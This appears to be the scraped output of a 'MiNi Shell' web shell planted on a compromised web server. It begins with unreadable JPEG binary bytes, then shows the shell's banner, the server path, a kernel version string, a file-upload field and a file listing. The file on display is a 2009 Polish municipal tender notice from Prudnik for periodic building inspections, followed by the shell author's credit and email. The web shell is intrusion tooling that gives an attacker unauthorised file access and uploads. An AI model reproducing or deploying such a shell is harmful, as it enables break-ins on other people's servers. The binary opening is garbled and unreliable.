JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090320/53069-N-2009.html

<p class="kh_header"><b>Prudnik: Wykonanie pięcioletniej kontroli okresowej stanu sprawności technicznej budynków oraz lokali mieszkalnych i użytkowych zarządzanych przez Zarząd Budynków Komunalnych w Prudniku</b><br>
<b>Numer ogłoszenia: 53069 - 2009; data zamieszczenia: 20.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Komunalnych , ul. Piastowska 42, 48-200 Prudnik, woj. opolskie, tel. 077 4363884, faks 077 4363884.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbkprudnik.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie pięcioletniej kontroli okresowej stanu sprawności technicznej budynków oraz lokali mieszkalnych i użytkowych zarządzanych przez Zarząd Budynków Komunalnych w Prudniku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający zleca a Wykonawca przyjmuje do wykonania następujący przedmiot zamówienia:
Wykonanie pięcioletniej kontroli okresowej stanu sprawności technicznej budynków oraz lokali  mieszkalnych i użytkowych  zarządzanych przez Zarząd Budynków Komunalnych w Prudniku
Wykaz budynków i lokali wraz z podziałem na etapy realizacji stanowi załącznik nr 8 do niniejszej specyfikacji.

2. Zadaniem Wykonawcy będzie:

I. Sprawdzenie stanu technicznego przydatności do użytkowania obiektu budowlanego, estetyki obiektu budowlanego oraz jego otoczenia zgodnie z art. 62 ustawy z dnia 7 lipca 1994 r. Prawa Budowlanego (  tj. Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 16 sierpnia 1999 r. w sprawie warunków technicznych użytkowania budynków mieszkalnych (Dz. U. 99 Nr 74 poz. 836)
w zakresie:  
 
A. branży ogólno-budowlanej  -budynki

Oględziny i analiza stanu technicznego
- ściany zewnętrzne, warstwy fakturowe. 
- attyki, filary, gzymsy, balustrady, loggie, balkony 
- mocowanie urządzeń do ścian i dachu budynku 
- elementy odwodnienia oraz obróbki blacharskie 
- konstrukcja dachowa
- pokrycie dachowe 
- kominy ponad dachem.
- przejścia przyłączy przez ściany budynku 
- stolarka okienna 
- stolarka drzwiowa 
- izolacje 
- schody zewnętrzne 
- schody wewnętrzne, 
- klatka schodowa  

B. branży ogólno-budowlanej  -lokale mieszkalne i lokale użytkowe 

- tynki wewnętrzne
- malatura
- stolarka okienna 
- stolarka drzwiowa wewnętrzna
- posadzki 
- piece kuchenne i pokojowe  

Sprawdzenie  elementów budynku narażonych na szkodliwe działanie wpływów atmosferycznych i innych czynników. 
Wartość użytkowa elementów budynku.
Estetyka budynku i jego otoczenia. 
Ocena % rozmiaru zużycia - ocena po oględzinach.

C. branży elektrycznej w zakresie: 

-	kontrola instalacji elektrycznych w lokalach mieszkalnych i użytkowych,
-	kontrola instalacji elektrycznych oświetlenia administracyjnego (klatka schodowa, strych, piwnica),
-	kontrola instalacji elektrycznej wewnętrznej linii zasilającej w klatce schodowej,
-	kontrola instalacji piorunochronnej na obiekcie.

Badania okresowe mają na celu sprawdzenie, czy stan techniczny instalacji lub urządzeń elektrycznych w trakcie eksploatacji nie uległ pogorszeniu w stopniu stwarzającym zagrożenie dla ich dalszego bezpiecznego użytkowania. Okresowe sprawdzanie i próby instalacji oraz urządzeń elektrycznych powinny dać odpowiedź na pytanie, czy wymagania stawiane instalacji (urządzeniu) są zachowane w czasie ich użytkowania.
Okresowe sprawdzanie i próby powinny obejmować co najmniej:
1.	oględziny instalacji,
2.	pomiary rezystancji izolacji,
3.	badania ochrony przed dotykiem pośrednim,

- dla instalacji odgromowej badania wraz z metryką urządzeń

D. branży sanitarnej

Oględziny i analiza stanu technicznego instalacji wraz z armatura w lokalach mieszkalnych:
- instalacji gazowej 
- instalacji kanalizacji sanitarnej 
- instalacji kanalizacji deszczowej 
- instalacji wody użytkowej zimnej i ciepłej
- instalacji wodnej p.poż. i hydrantów
- instalacji c.o.
Ocena stanu izolacji termicznych i akustycznych. 

E. prac kominiarskich

Oględziny i analiza stanu technicznego:
- przewodów dymowych 
- grawitacyjnych przewodów spalinowych i wentylacyjnych 

II.	Dokonanie wpisów do książki obiektu budowlanego a także wykonanie zestawień robót remontowych w kolejności ich wykonania z uwzględnieniem stopni pilności dla każdego elementu budynku oraz lokalu mieszkalnego i lokalu użytkowego w poszczególnych branżach wg załącznik nr 10 do SIWZ (zestawienie w kolorach), a dodatkowo : 
a)	wykonanie  inwentaryzacji przewodów kominowych  w formie szkicu wraz  z oznaczeniem, ponumerowaniem , opisaniem odnośnie    podłączeń  urządzeń.
     -integralną częścią protokołu przeglądu jest załącznik  inwentaryzacji.
b)	zestawienie wszystkich nieprawidłowości i zagrożeń  wynikających  z protokołów wykonanych w poszczególnych branżach na każdy lokal mieszkalny danego budynku po rozliczeniu każdego etapu.
c)	zestawienie wszystkich nieprawidłowości i zagrożeń  wynikających  z protokołów wykonanych w poszczególnych branżach na każdy budynek  po rozliczeniu każdego  etapu.
  -  zestawienia winny być przekazane w wersji wydruku oraz w wersji
elektronicznej.              

 III. Z przeprowadzonych przeglądów Wykonawca sporządzi protokoły okresowej kontroli obiektów budowlanych  wg. załącznika nr 9 do SIWZ wraz z załącznikami od nr 1 do nr 10 wg wzorów będących załącznikami do SIWZ i do umowy oraz:

a)	przekaże kopie  protokołów najemcom lokali
b)	przekaże oryginały protokołów  Zamawiającemu w 1 egzemplarzu 
(protokoły w każdej z branż winny być wypełnione długopisem w kolorze niebieskim 
i podpisane przez najemcę.) 
c)	kompletną dokumentację na każdy budynek z osobna należy złożyć w skoroszycie wpinanym PCV (na dziurki)
       
IV. Wykonawca przed rozpoczęciem przeglądu może  zapoznać się z protokołami z poprzednich przeglądów, z protokołami odbioru robót remontowych wykonywanych w budynku w okresie od poprzedniego przeglądu, zgłoszeniami użytkowników lokali dotyczącymi usterek, wad, uszkodzeń lub zniszczeń elementów budynku, a Zamawiający zobowiązuje się udostępnić mu posiadaną dokumentację. 
V. W przypadku sytuacji mogących spowodować zagrożenie życia lub zdrowia ludzi, bezpieczeństwa mienia bądź środowiska a w szczególności katastrofę budowlaną, pożar, wybuch, porażenie prądem elektrycznym albo zatrucie gazem - obowiązek usunięcia stwierdzonych uszkodzeń oraz uzupełnienie braków powinien być potwierdzony w protokole z kontroli obiektu budowlanego. Osoba dokonująca kontroli jest obowiązana bezzwłocznie przesłać kopię tego protokołu do właściwego organu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, spełniają warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz spełniają następujące warunki udziału:              
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień .
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
-	Posiadają doświadczenie z ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wyrażające się tym, że wykonali co najmniej jeden przegląd kontroli stanu technicznego budynków mieszkalnych wielorodzinnych.
            Doświadczenia podwykonawców oraz ich zasoby nie będą brane pod uwagę przy określaniu czy wykonawca spełnia warunki udziału.
  - Osoby, które będą uczestniczyć w wykonywaniu zamówienia, winny należeć do Okręgowej Izby Inżynierów Budownictwa OIIB i posiadać wymagane uprawnienia budowlane do wykonywania przeglądów okresowych budynków a dodatkowo w zakresie instalacji elektrycznej - świadectwo kwalifikacyjne D z uprawnieniami dotyczącymi prac kontrolno-pomiarowych, w branży gazowej - świadectwo kwalifikacyjne D oraz w zakresie branży kominiarskiej przeglądy mogą być dokonywane przez osoby z uprawnieniami Mistrza w Rzemiośle Kominiarskim
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy)

2)Zamawiający dokona oceny spełniania każdego z warunków na podstawie załączonych do oferty dokumentów i oświadczeń, o których mowa w pkt. 9 ppkt. 1 lit a -i według formuły spełnia/nie spełnia. Brak załączenia przez Wykonawcę któregokolwiek z dokumentów zostanie uznane przez zamawiającego jako niespełnienie warunku, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)  oświadczenie wykonawcy, o spełnianiu warunków określonych w art. 22 ustawy, według wzoru, stanowiącego załącznik nr 2 do niniejszej SIWZ; W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.
b) Oświadczenie o nie podleganiu wykluczeniu zgodnie z art. 24 ust. 1 i 2 ustawy Pzp  ( załącznik nr 3 ), w przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną
c)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpi?sie do ewidencji działalności gospodarczej potwierdzające, że profil działal?ności wykonawcy odpowiada przedmiotowi zamówienia, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku składania oferty wspólnej w/w dokument składa każdy z wykonawców składających ofertę wspólną.
d)  wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  (lub pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa, wykonawca wykazał osoby, którymi będzie dysponował) według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ.
 W przypadku składania oferty wspólnej wykonawcy składają jeden wspól?ny wykaz kadry
e)  dokumenty lub oświadczenia stwierdzające, że osoby, o których mowa w pdpkt d) posiada?ją wymagane uprawnienia tj. kopie uprawnień budowlanych oraz aktual?ne zaświadczenia o przynależności tych osób do OIIB;
f) wykaz wykonanych co najmniej jednego przeglądu kontroli stanu technicznej budynków mieszkalnych wielorodzinnych  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a je?żeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowia?dających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wyko?nania, według wzoru stanowiącego załącznik nr 5 do niniejszej SIWZ oraz dokumenty (np. referencje, protokoły odbioru końcowego) potwierdzające, że usługi te zostały wykonane należycie.
g) oświadczenie o nie karaniu  w zakresie objętym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych dotyczące: prawomocnego skazania za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego  załącznik nr 6
h) oświadczenie o nie zaleganiu w podatkach i opłatach i składkach na ubezpieczenie społeczne i zdrowotne załącznik nr 6
i)  pełnomocnictwo,  
oryginał pełnomocnictwa, podpisany przez uprawnionych przedstawicieli wykonawcy (współwykonawców) lub poświadczona przez nich  za zgodność z oryginałem kopia pełnomocnictwa. W przypadku składania oferty wspólnej należy złożyć jeden dokument..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zbkprudnik.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Komunalnych
48-200 Prudnik, 
ul. Piastowska nr 42.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2009 godzina 10:00, miejsce: Zarząd Budynków Komunalnych
48-200 Prudnik, 
ul. Piastowska nr 42
sekretariat, pok. nr 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com